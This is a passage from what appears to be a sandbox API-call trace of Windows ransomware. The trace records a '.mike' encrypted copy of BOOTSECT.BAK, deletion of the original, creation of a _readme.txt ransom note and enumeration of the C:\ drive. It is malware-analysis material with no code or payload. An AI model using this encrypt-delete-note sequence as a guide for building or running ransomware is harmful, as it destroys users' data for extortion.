ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1bc) returned 1 [0038.854] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.mike", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.mike", lpFilePart=0x0) returned 0x14 [0038.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0038.854] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.mike" (normalized: "c:\\bootsect.bak.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0038.855] GetFileType (hFile=0x264) returned 0x1 [0038.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af158) returned 1 [0038.855] GetFileType (hFile=0x264) returned 0x1 [0038.855] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af130*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af130*=0) returned 0x0 [0038.855] WriteFile (in: hFile=0x264, lpBuffer=0x20f2df8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af1dc, lpOverlapped=0x0 | out: lpBuffer=0x20f2df8*, lpNumberOfBytesWritten=0x2af1dc*=0x220, lpOverlapped=0x0) returned 1 [0038.856] CloseHandle (hObject=0x264) returned 1 [0038.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af208) returned 1 [0038.857] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x20f2a48 | out: lpFileInformation=0x20f2a48*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0038.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af204) returned 1 [0038.862] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af14c) returned 1 [0038.877] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0038.877] GetFileType (hFile=0x264) returned 0x1 [0038.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af148) returned 1 [0038.877] GetFileType (hFile=0x264) returned 0x1 [0038.877] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af1dc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af1dc*=0) returned 0x0 [0038.877] ReadFile (in: hFile=0x264, lpBuffer=0x20f3eb4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af1e8, lpOverlapped=0x0 | out: lpBuffer=0x20f3eb4*, lpNumberOfBytesRead=0x2af1e8*=0x2000, lpOverlapped=0x0) returned 1 [0038.879] CloseHandle (hObject=0x264) returned 1 [0038.904] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.mike", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.mike", lpFilePart=0x0) returned 0x14 [0038.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0038.904] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.mike" (normalized: "c:\\bootsect.bak.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0038.904] GetFileType (hFile=0x264) returned 0x1 [0038.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af158) returned 1 [0038.904] GetFileType (hFile=0x264) returned 0x1 [0038.904] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af130*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af130*=0) returned 0x220 [0038.904] WriteFile (in: hFile=0x264, lpBuffer=0x20fcc1c*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2af1fc, lpOverlapped=0x0 | out: lpBuffer=0x20fcc1c*, lpNumberOfBytesWritten=0x2af1fc*=0x2000, lpOverlapped=0x0) returned 1 [0038.905] CloseHandle (hObject=0x264) returned 1 [0038.906] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.mike", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.mike", lpFilePart=0x0) returned 0x14 [0038.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0038.906] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.mike" (normalized: "c:\\bootsect.bak.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0038.906] GetFileType (hFile=0x264) returned 0x1 [0038.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0038.906] GetFileType (hFile=0x264) returned 0x1 [0039.050] WriteFile (in: hFile=0x264, lpBuffer=0x2103830*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af20c, lpOverlapped=0x0 | out: lpBuffer=0x2103830*, lpNumberOfBytesWritten=0x2af20c*=0x20c, lpOverlapped=0x0) returned 1 [0039.050] CloseHandle (hObject=0x264) returned 1 [0039.052] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0039.052] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.mike", nBufferLength=0x105, lpBuffer=0x2aedf8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.mike", lpFilePart=0x0) returned 0x14 [0039.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af258) returned 1 [0039.052] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK.mike" (normalized: "c:\\bootsect.bak.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af2d4 | out: lpFileInformation=0x2af2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe15cbfc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe15cbfc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe17bb1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2220)) returned 1 [0039.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af254) returned 1 [0039.053] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0039.053] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.mike", nBufferLength=0x105, lpBuffer=0x2aedf4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.mike", lpFilePart=0x0) returned 0x14 [0039.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2a0) returned 1 [0039.053] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK.mike" (normalized: "c:\\bootsect.bak.mike"), fInfoLevelId=0x0, lpFileInformation=0x2104b9c | out: lpFileInformation=0x2104b9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe15cbfc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe15cbfc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe17bb1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2220)) returned 1 [0039.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af29c) returned 1 [0039.065] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aed78, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0039.066] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 1 [0039.066] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aee00, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0039.067] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0039.068] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedf8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0039.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af258) returned 1 [0039.068] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x2af2d4 | out: lpFileInformation=0x2af2d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af254) returned 1 [0039.068] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0039.068] GetFullPathNameW (in: lpFileName="C:\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\_readme.txt", lpFilePart=0x0) returned 0xe [0039.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af188) returned 1 [0039.068] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0039.068] GetFileType (hFile=0x264) returned 0x1 [0039.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af184) returned 1 [0039.068] GetFileType (hFile=0x264) returned 0x1 [0039.069] WriteFile (in: hFile=0x264, lpBuffer=0x2106468*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af220, lpOverlapped=0x0 | out: lpBuffer=0x2106468*, lpNumberOfBytesWritten=0x2af220*=0x45e, lpOverlapped=0x0) returned 1 [0039.069] CloseHandle (hObject=0x264) returned 1 [0039.070] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0039.070] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0039.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af30c) returned 1 [0039.071] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2aee14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0039.071] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2aede8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0039.071] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2af034 | out: lpFindFileData=0x2af034*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x4d0ba0 [0039.113] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0039.113] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0039.114] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe15cbfc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe15cbfc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe17bb1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2220, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK.mike", cAlternateFileName="BOOTSE~1.MIK")) returned 1 [0039.114] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0039.114] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0039.114] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0039.114] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0039.114] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0039.114] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd7569640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd7569640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0039.115] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe17e1300, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe17e1300, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe17e1300, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0039.116] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe17e1300, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe17e1300, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe17e1300, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0039.116] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af2cc) returned 1 [0039.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af2d8) returned 1 [0039.116] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\.", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin", lpFilePart=0x0) returned 0xf [0039.116] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.116] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.116] CoTaskMemFree (pv=0x4fe370) [0039.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.116] GetFullPathNameW (in: lpFileName="C:\\Boot\\.", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0039.116] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.116] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.116] CoTaskMemFree (pv=0x4fe370) [0039.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.117] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x2aedfc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0039.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0039.117] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0039.117] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0039.117] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.117] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.117] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0039.117] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, 